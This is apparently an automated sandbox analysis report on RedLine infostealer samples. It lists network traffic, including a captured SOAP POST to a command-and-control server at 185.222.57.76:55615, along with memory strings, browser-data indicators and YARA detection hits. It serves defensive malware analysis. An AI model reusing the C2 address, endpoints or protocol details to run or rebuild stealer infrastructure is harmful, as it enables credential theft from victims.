Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.76

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.76:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.000000000305C000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.76:5
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.76:55615
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.76:55615/
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.76:55615t-
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: nzLoHpgAln.exe, 00000000.00000002.1751633310.0000000002732000.00000004.00000800.00020000.00000000.sdmp, nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1849378613.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.000000000305C000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: nzLoHpgAln.exe, 00000000.00000002.1763631422.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.00000000032D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000E.00000002.1954001062.00000000032D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nzLoHpgAln.exe, nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, wZWwzQVEakJvEU.exe, 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp7E24.tmp.14.dr, tmpE739.tmp.8.dr, tmp214E.tmp.8.dr, tmp212A.tmp.8.dr, tmpE729.tmp.8.dr, tmp7E97.tmp.14.dr, tmp7E86.tmp.14.dr, tmp214D.tmp.8.dr, tmp44D3.tmp.14.dr, tmp212B.tmp.8.dr, tmpB76A.tmp.14.dr, tmp44C3.tmp.14.dr, tmp44A1.tmp.14.dr, tmp213C.tmp.8.dr, tmp211A.tmp.8.dr, tmpE74A.tmp.8.dr, tmp7E75.tmp.14.dr, tmp44B2.tmp.14.dr, tmp2109.tmp.8.dr, tmp215E.tmp.8.dr, tmpE74B.tmp.8.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008107D4 NtQueryInformationProcess,		0_2_008107D4
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB07D4 NtQueryInformationProcess,		10_2_00FB07D4

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00812820	0_2_00812820
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008114D0	0_2_008114D0
